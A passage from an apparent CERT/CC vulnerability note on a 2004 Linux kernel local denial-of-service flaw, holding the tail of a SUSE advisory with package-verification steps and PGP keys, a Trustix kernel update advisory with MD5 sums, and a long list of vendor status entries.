\nannouncement in the first place. If RPM packages are being rebuilt \nand a new version of a package is published on the ftp server, all \nmd5 sums for the files are useless. \n \n2) rpm package signatures provide an easy way to verify the authenticity \nof an rpm package. Use the command \nrpm -v --checksig <file.rpm> \nto verify the signature of the package, where <file.rpm> is the \nfilename of the rpm package that you have downloaded. Of course, \npackage authenticity verification can only target an un-installed rpm \npackage file. \nPrerequisites: \na) gpg is installed \nb) The package is signed using a certain key. The public part of this \nkey must be installed by the gpg program in the directory \n~/.gnupg/ under the user's home directory who performs the \nsignature verification (usually root). You can import the key \nthat is used by SUSE in rpm packages for SUSE Linux by saving \nthis announcement to a file (\"announcement.txt\") and \nrunning the command (do \"su -\" to be root): \ngpg --batch; gpg < announcement.txt | gpg --import \nSUSE Linux distributions version 7.1 and thereafter install the \nkey \"build@suse.de\" upon installation or upgrade, provided that \nthe package gpg is installed. The file containing the public key \nis placed at the top-level directory of the first CD (pubring.gpg) \nand at <ftp://ftp.suse.com/pub/suse/pubring.gpg-build.suse.de> . \n \n \n- SUSE runs two security mailing lists to which any interested party may \nsubscribe: \n \nsuse-security@suse.com \n- general/linux/SUSE security discussion. \nAll SUSE security announcements are sent to this list. \nTo subscribe, send an email to \n<suse-security-subscribe@suse.com>. \n \nsuse-security-announce@suse.com \n- SUSE's announce-only mailing list. \nOnly SUSE's security announcements are sent to this list. \nTo subscribe, send an email to \n<suse-security-announce-subscribe@suse.com>. \n \nFor general information or the frequently asked questions (faq) \nsend mail to: \n<suse-security-info@suse.com> or \n<suse-security-faq@suse.com> respectively. \n \n===================================================================== \nSUSE's security contact is <security@suse.com> or <security@suse.de>. \nThe <security@suse.de> public key is listed below. \n===================================================================== \n______________________________________________________________________________ \n \nThe information in this advisory may be distributed or reproduced, \nprovided that the advisory is not modified in any way. In particular, \nit is desired that the clear-text signature must show proof of the \nauthenticity of the text. \nSUSE Linux AG makes no warranties of any kind whatsoever with respect \nto the information contained in this security advisory. \n \nType Bits/KeyID Date User ID \npub 2048R/3D25D3D9 1999-03-06 SuSE Security Team <security@suse.de> \npub 1024D/9C800ACA 2000-10-19 SuSE Package Signing Key <build@suse.de> \n \n- -----BEGIN PGP PUBLIC KEY BLOCK----- \nVersion: GnuPG v1.0.6 (GNU/Linux) \nComment: For info see <http://www.gnupg.org> \n \nmQGiBDnu9IERBACT8Y35+2vv4MGVKiLEMOl9GdST6MCkYS3yEKeueNWc+z/0Kvff \n4JctBsgs47tjmiI9sl0eHjm3gTR8rItXMN6sJEUHWzDP+Y0PFPboMvKx0FXl/A0d \nM+HFrruCgBlWt6FA+okRySQiliuI5phwqkXefl9AhkwR8xocQSVCFxcwvwCglVcO \nQliHu8jwRQHxlRE0tkwQQI0D+wfQwKdvhDplxHJ5nf7U8c/yE/vdvpN6lF0tmFrK \nXBUX+K7u4ifrZlQvj/81M4INjtXreqDiJtr99Rs6xa0ScZqITuZC4CWxJa9GynBE \nD3+D2t1V/f8l0smsuYoFOF7Ib49IkTdbtwAThlZp8bEhELBeGaPdNCcmfZ66rKUd \nG5sRA/9ovnc1krSQF2+sqB9/o7w5/q2qiyzwOSTnkjtBUVKn4zLUOf6aeBAoV6NM \nCC3Kj9aZHfA+ND0ehPaVGJgjaVNFhPi4x0e7BULdvgOoAqajLfvkURHAeSsxXIoE \nmyW/xC1sBbDkDUIBSx5oej73XCZgnj/inphRqGpsb+1nKFvF+rQoU3VTRSBQYWNr \nYWdlIFNpZ25pbmcgS2V5IDxidWlsZEBzdXNlLmRlPohcBBMRAgAcBQI57vSBBQkD \nwmcABAsKAwQDFQMCAxYCAQIXgAAKCRCoTtronIAKyl8sAJ98BgD40zw0GHJHIf6d \nNfnwI2PAsgCgjH1+PnYEl7TFjtZsqhezX7vZvYCIRgQQEQIABgUCOnBeUgAKCRCe \nQOMQAAqrpNzOAKCL512FZvv4VZx94TpbA9lxyoAejACeOO1HIbActAevk5MUBhNe \nLZa/qM2JARUDBRA6cGBvd7LmAD0l09kBATWnB/9An5vfiUUE1VQnt+T/EYklES3t \nXXaJJp9pHMa4fzFa8jPVtv5UBHGee3XoUNDVwM2OgSEISZxbzdXGnqIlcT08TzBU \nD9i579uifklLsnr35SJDZ6ram51/CWOnnaVhUzneOA9gTPSr+/fT3WeVnwJiQCQ3 \n0kNLWVXWATMnsnT486eAOlT6UNBPYQLpUprF5Yryk23pQUPAgJENDEqeU6iIO9Ot \n1ZPtB0lniw+/xCi13D360o1tZDYOp0hHHJN3D3EN8C1yPqZd5CvvznYvB6bWBIpW \ncRgdn2DUVMmpU661jwqGlRz1F84JG/xe4jGuzgpJt9IXSzyohEJB6XG5+D0BiF0E \nExECAB0FAjxqqTQFCQoAgrMFCwcKAwQDFQMCAxYCAQIXgAAKCRCoTtronIAKyp1f \nAJ9dR7saz2KPNwD3U+fy/0BDKXrYGACfbJ8fQcJqCBQxeHvt9yMPDVq0B0W5Ag0E \nOe70khAIAISR0E3ozF/la+oNaRwxHLrCet30NgnxRROYhPaJB/Tu1FQokn2/Qld/ \nHZnh3TwhBIw1FqrhWBJ7491iAjLR9uPbdWJrn+A7t8kSkPaF3Z/6kyc5a8fas44h \nt5h+6HMBzoFCMAq2aBHQRFRNp9Mz1ZvoXXcI1lk1l8OqcUM/ovXbDfPcXsUVeTPT \ntGzcAi2jVl9hl3iwJKkyv/RLmcusdsi8YunbvWGFAF5GaagYQo7YlF6UaBQnYJTM \n523AMgpPQtsKm9o/w9WdgXkgWhgkhZEeqUS3m5xNey1nLu9iMvq9M/iXnGz4sg6Q \n2Y+GqZ+yAvNWjRRou3zSE7Bzg28MI4sAAwYH/2D71Xc5HPDgu87WnBFgmp8MpSr8 \nQnSs0wwPg3xEullGEocolSb2c0ctuSyeVnCttJMzkukL9TqyF4s/6XRstWirSWaw \nJxRLKH6Zjo/FaKsshYKf8gBkAaddvpl3pO0gmUYbqmpQ3xDEYlhCeieXS5MkockQ \n1sj2xYdB1xO0ExzfiCiscUKjUFy+mdzUsUutafuZ+gbHog1CN/ccZCkxcBa5IFCH \nORrNjq9pYWlrxsEn6ApsG7JJbM2besW1PkdEoxak74z1senh36m5jQvVjA3U4xq1 \nwwylxadmmJaJHzeiLfb7G1ZRjZTsB7fyYxqDzMVul6o9BSwO/1XsIAnV1uuITAQY \nEQIADAUCOe70kgUJA8JnAAAKCRCoTtronIAKyksiAJsFB3/77SkH3JlYOGrEe1Ol \n0JdGwACeKTttgeVPFB+iGJdiwQlxasOfuXyITAQYEQIADAUCPGqpWQUJCgCCxwAK \nCRCoTtronIAKyofBAKCSZM2UFyta/fe9WgITK9I5hbxxtQCfX+0ar2CZmSknn3co \nSPihn1+OBNyZAQ0DNuEtBAAAAQgAoCRcd7SVZEFcumffyEwfLTcXQjhKzOahzxpo \nomuF+HIyU4AGq+SU8sTZ/1SsjhdzzrSAfv1lETACA+3SmLr5KV40Us1w0UC64cwt \nA46xowVq1vMlH2Lib+V/qr3b1hE67nMHjysECVx9Ob4gFuKNoR2eqnAaJvjnAT8J \n/LoUC20EdCHUqn6v+M9t/WZgC+WNR8cq69uDy3YQhDP/nIan6fm2uf2kSV9A7ZxE \nGrwsWl/WX5Q/sQqMWaU6r4az98X3z90/cN+eJJ3vwtA+rm+nxEvyev+jaLuOQBDf \nebh/XA4FZ35xmi+spdiVeJH4F/ubaGlmj7+wDOF3suYAPSXT2QAFEbQlU3VTRSBT \nZWN1cml0eSBUZWFtIDxzZWN1cml0eUBzdXNlLmRlPokBFQMFEDbhLUfkWLKHsco8 \nRQEBVw4H/1vIdiOLX/7hdzYaG9crQVIk3QwaB5eBbjvLEMvuCZHiY2COUg5QdmPQ \n8SlWNZ6k4nu1BLcv2g/pymPUWP9fG4tuSnlUJDrWGm3nhyhAC9iudP2u1YQY37Gb \nB6NPVaZiYMnEb4QYFcqv5c/r2ghSXUTYk7etd6SW6WCOpEqizhx1cqDKNZnsI/1X` \n`11pFcO2N7rc6byDBJ1T+cK+F1Ehan9XBt/shryJmv04nli5CXQMEbiqYYMOu8iaA \n8AWRgXPCWqhyGhcVD3LRhUJXjUOdH4ZiHCXaoF3zVPxpeGKEQY8iBrDeDyB3wHmj \nqY9WCX6cmogGQRgYG6yJqDalLqrDOdmJARUDBRA24S0Ed7LmAD0l09kBAW04B/4p \nWH3f1vQn3i6/+SmDjGzUu2GWGq6Fsdwo2hVM2ym6CILeow/K9JfhdwGvY8LRxWRL \nhn09j2IJ9P7H1Yz3qDf10AX6V7YILHtchKT1dcngCkTLmDgC4rs1iAAl3f089sRG \nBafGPGKv2DQjHfR1LfRtbf0P7c09Tkej1MP8HtQMW9hPkBYeXcwbCjdrVGFOzqx+ \nAvvJDdT6a+oyRMTFlvmZ83UV5pgoyimgjhWnM1V4bFBYjPrtWMkdXJSUXbR6Q7Pi \nRZWCzGRzwbaxqpl3rK/YTCphOLwEMB27B4/fcqtBzgoMOiaZA0M5fFoo54KgRIh0 \nzinsSx2OrWgvSiLEXXYKiEYEEBECAAYFAjseYcMACgkQnkDjEAAKq6ROVACgjhDM \n/3KM+iFjs5QXsnd4oFPOnbkAnjYGa1J3em+bmV2aiCdYXdOuGn4ZiQCVAwUQN7c7 \nwhaQN/7O/JIVAQEB+QP/cYblSAmPXxSFiaHWB+MiUNw8B6ozBLK0QcMQ2YcL6+Vl \nD+nSZP20+Ja2nfiKjnibCv5ss83yXoHkYk2Rsa8foz6Y7tHwuPiccvqnIC/c9Cvz \ndbIsdxpfsi0qWPfvX/jLMpXqqnPjdIZErgxpwujas1n9016PuXA8K3MJwVjCqSKI \nRgQQEQIABgUCOhpCpAAKCRDHUqoysN/3gCt7AJ9adNQMbmA1iSYcbhtgvx9ByLPI \nDgCfZ5Wj+f7cnYpFZI6GkAyyczG09sE= \n=LRKC \n- -----END PGP PUBLIC KEY BLOCK----- \n \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.2.2 (GNU/Linux) \n \niQEVAwUBQNBTgney5gA9JdPZAQHB7Af/XRy01sYB1rDi0L+TwlQtW4nr4vwrJTOt \n6pA/M+oNsW0SUPK3kCcN+v7mvuIrA69c1VZeYgfI4/dy0bdMntcVkOliikn0+m0i \ne2SvKYY+/KC8wZaUIrKFbH4PA0Gdf40GmNVj4uq5KdwohJLGQDTa8eguiYocMjXv \nE8QAdGTaPXEBGz8Ode6YMYAbauHbWXip9x6TyQ7NgiQ4mylabmmw8AUebVyM4oWS \na28uoT8nWPu+BwYNW0zt26clPhLvmHWFpIpqyaWERaWMuCrFHwlc753B2PCOVdnm \nYj/ugqlkkGRysclITz3WFbUGUKtd91AdZAEK6l+MxkuqRDZmNUYgHw== \n=q9W1 \n-----END PGP SIGNATURE-----`\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23973654 Feedback>).\n\n### __ __ Trustix Secure Linux\n\nNotified: June 16, 2004 Updated: June 16, 2004 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\n`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \n- -------------------------------------------------------------------------- \nTrustix Secure Linux Bugfix Advisory #2004-0034 \n \nPackage name: kernel \nSummary: Local DoS \nDate: 2004-06-16 \nAffected versions: Trustix Secure Linux 2.0 \nTrustix Secure Linux 2.1 \nTrustix Operating System - Enterprise Server 2 \n \n- -------------------------------------------------------------------------- \nPackage description: \nThe kernel package contains the Linux kernel (vmlinuz), the core of your \nTrustix Secure Linux operating system. The kernel handles the basic \nfunctions of the operating system: memory allocation, process allocation, \ndevice input and output, etc. \n \nProblem description: \nA flaw was by accident discovered by Stian Skjelstad when he was doing \nsome code tests during vacation. He was quite surprised when I discovered \nthat the code he was trying froze his machine. He reported it to the \nLinux-kernel mailing list and the gcc bugzilla 2004-06-09. \n \nSee CAN-2004-0554 at <http://cve.mitre.org/> for more information. \n \n \nAction: \nWe recommend that all systems with this package installed be upgraded. \nPlease note that if you do not need the functionality provided by this \npackage, you may want to remove it from your system. \n \n \nLocation: \nAll Trustix Secure Linux updates are available from \n<URI:<http://http.trustix.org/pub/trustix/updates/>> \n<URI:<ftp://ftp.trustix.org/pub/trustix/updates/>> \n \n \nAbout Trustix Secure Linux: \nTrustix Secure Linux is a small Linux distribution for servers. With focus \non security and stability, the system is painlessly kept safe and up to \ndate from day one using swup, the automated software updater. \n \n \nAutomatic updates: \nUsers of the SWUP tool can enjoy having updates automatically \ninstalled using 'swup --upgrade'. \n \n \nPublic testing: \nMost updates for Trustix Secure Linux are made available for public \ntesting some time before release. \nIf you want to contribute by testing the various packages in the \ntesting tree, please feel free to share your findings on the \ntsl-discuss mailinglist. \nThe testing tree is located at \n<URI:<http://tsldev.trustix.org/horizon/>> \n \nYou may also use swup for public testing of updates: \n \nsite { \nclass = 0 \nlocation = \"<http://tsldev.trustix.org/horizon/rdfs/latest.rdf>\" \nregexp = \".*\" \n} \n \n \nQuestions? \nCheck out our mailing lists: \n<URI:<http://www.trustix.org/support/>> \n \n \nVerification: \nThis advisory along with all Trustix packages are signed with the \nTSL sign key. \nThis key is available from: \n<URI:<http://www.trustix.org/TSL-SIGN-KEY>> \n \nThe advisory itself is available from the errata pages at \n<URI:<http://www.trustix.org/errata/trustix-2.0/>> and \n<URI:<http://www.trustix.org/errata/trustix-2.1/>> \nor directly at \n<URI:<http://www.trustix.org/errata/2004/0034>> \n \n \nMD5sums of the packages: \n- -------------------------------------------------------------------------- \n4eeda04ede3e7538c560d78db0087abf 2.1/rpms/kernel-2.4.26-2tr.i586.rpm \nf116f17ce723574940cf5653e24b189b 2.1/rpms/kernel-BOOT-2.4.26-2tr.i586.rpm \nbeb2d9638544bbe1e3d3d4c4f3bc0841 2.1/rpms/kernel-doc-2.4.26-2tr.i586.rpm \n1da3f4c3c5489ad6441c1deb77ade460 2.1/rpms/kernel-firewall-2.4.26-2tr.i586.rpm \n33a3d2cc288d8feca38bf723a532d5fc 2.1/rpms/kernel-firewallsmp-2.4.26-2tr.i586.rpm \n2eca74fa29f9ab94400c3b660f1cb7d4 2.1/rpms/kernel-smp-2.4.26-2tr.i586.rpm \n87d8729ae10b644fd4293028064b4449 2.1/rpms/kernel-source-2.4.26-2tr.i586.rpm \n5e79ec0c2f39096258f277b6c9742010 2.1/rpms/kernel-utils-2.4.26-2tr.i586.rpm \n19085e9447cf6c6e442dc7b5cce2741d 2.0/rpms/kernel-2.4.26-2tr.i586.rpm \n65a65ef1e6387ff9d1c00f4775baf824 2.0/rpms/kernel-BOOT-2.4.26-2tr.i586.rpm \ncfe247f0b22f9f9964ad192610030429 2.0/rpms/kernel-doc-2.4.26-2tr.i586.rpm \nbe9eaf3ea57f93f12732927230014e5d 2.0/rpms/kernel-firewall-2.4.26-2tr.i586.rpm \n7ac9ad8333acd85d59337ab963021c95 2.0/rpms/kernel-firewallsmp-2.4.26-2tr.i586.rpm \nff07e3390ca40209e1a3e8cd4b5b6d3a 2.0/rpms/kernel-smp-2.4.26-2tr.i586.rpm \n5216d7c88b49b6f4588ff68ca15a9bc5 2.0/rpms/kernel-source-2.4.26-2tr.i586.rpm \n5881e9c49f504248ccdb983430f3d3cf 2.0/rpms/kernel-utils-2.4.26-2tr.i586.rpm \n24ea881f70d85501dde7b0bd280db86b e2/kernel-2.4.26-2tr.i586.rpm \nb19ab411d3ecb4033b828a1dbd8b7d6e e2/kernel-BOOT-2.4.26-2tr.i586.rpm \n86bf9bee49f8aca7220c1be1fa085bc6 e2/kernel-doc-2.4.26-2tr.i586.rpm \n2ae2ddcca0440e2a7995208500b05b88 e2/kernel-firewall-2.4.26-2tr.i586.rpm \n53b6077acf13c8c1ae2358ad078b1710 e2/kernel-firewallsmp-2.4.26-2tr.i586.rpm \n7ad7e859f539438ca7ada4ed0b12ea76 e2/kernel-smp-2.4.26-2tr.i586.rpm \n2719c667ccbeabd5e40eadc747663ad3 e2/kernel-source-2.4.26-2tr.i586.rpm \nc340c5b408699be1d6d44a2d9b9211c8 e2/kernel-utils-2.4.26-2tr.i586.rpm \n- -------------------------------------------------------------------------- \n \n \nTrustix Security Team \n \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.2.2 (GNU/Linux) \n \niD8DBQFA0DFii8CEzsK9IksRAteIAJ97XC+eJOVpi/AVkvkk9W9O2byoGgCfYxMo \nK4oBAeXOexvaNTo652IzAnA= \n=7CnB \n-----END PGP SIGNATURE-----`\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23973654 Feedback>).\n\n### __ __ Apple Computer Inc.\n\nNotified: June 15, 2004 Updated: June 16, 2004 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nApple products are not affected by the issue reported in Vulnerability Note VU#973654.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23973654 Feedback>).\n\n### __ BSDI\n\nUpdated: June 16, 2004 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23973654 Feedback>).\n\n### __ Cray Inc.\n\nUpdated: June 16, 2004 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23973654 Feedback>).\n\n### __ Debian\n\nUpdated: June 16, 2004 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23973654 Feedback>).\n\n### __ EMC Corporation\n\nUpdated: June 16, 2004 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23973654 Feedback>).\n\n### __ FreeBSD\n\nUpdated: June 16, 2004 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23973654 Feedback>).\n\n### __ Fujitsu\n\nUpdated: June 16, 2004 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23973654 Feedback>).\n\n### __ Hewlett-Packard Company\n\nUpdated: June 16, 2004 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23973654 Feedback>).\n\n### __ Hitachi\n\nUpdated: June 16, 2004 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23973654 Feedback>).\n\n### __ IBM\n\nUpdated: June 16, 2004 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23973654 Feedback>).\n\n### __ IBM eServer\n\nUpdated: June 16, 2004 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23973654 Feedback>).\n\n### __ Ingrian Networks\n\nUpdated: June 16, 2004 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23973654 Feedback>).\n\n### __ Juniper Networks\n\nUpdated: June 16, 2004 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23973654 Feedback>).\n\n### __ MontaVista Software\n\nUpdated: June 16, 2004 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23973654 Feedback>).\n\n### __ NEC Corporation\n\nUpdated: June 16, 2004 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23973654 Feedback>).\n\n### __ NetBSD\n\nUpdated: June 16, 2004 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23973654 Feedback>).\n\n### __ Nokia\n\nUpdated: June 16, 2004 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23973654 Feedback>).\n\n### __ Novell\n\nUpdated: June 16, 2004 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23973654 Feedback>).\n\n### __ OpenBSD\n\nUpdated: June 16, 2004 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23973654 Feedback>).\n\n### __ Openwall GNU/*/Linux\n\nUpdated: June 16, 2004 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23973654 Feedback>).\n\n### __ SGI\n\nUpdated: June 16, 2004 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23973654 Feedback>).\n\n### __ Sequent\n\nUpdated: June 16, 2004 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23973654 Feedback>).\n\n### __ Sony Corporation\n\nUpdated: June 16, 2004 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23973654 Feedback>).\n\n### __ Sun Microsystems Inc.\n\nUpdated: June 16, 2004 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23973654 Feedback>).\n\n### __ The SCO Group (SCO Linux)\n\nUpdated: June 16, 2004 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23973654 Feedback>).\n\n### __ The SCO Group (SCO UnixWare)\n\nUpdated: June 16, 2004 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23973654 Feedback>).\n\n### __ TurboLinux\n\nNotified: June 15, 2004 Updated: June 16, 2004 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23973654 Feedback>).\n\n### __ Unisys\n\nNotified: June 15, 2004 Updated: June 16, 2004 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23973654 Feedback>).\n\n### __ Wind River Systems Inc.\n\nNotified: June 15, 2004 Updated: June 16, 2004 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23973654 Feedback>).\n\nView all 36 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html>\n * <http://secunia.com/advisories/11861/>\n 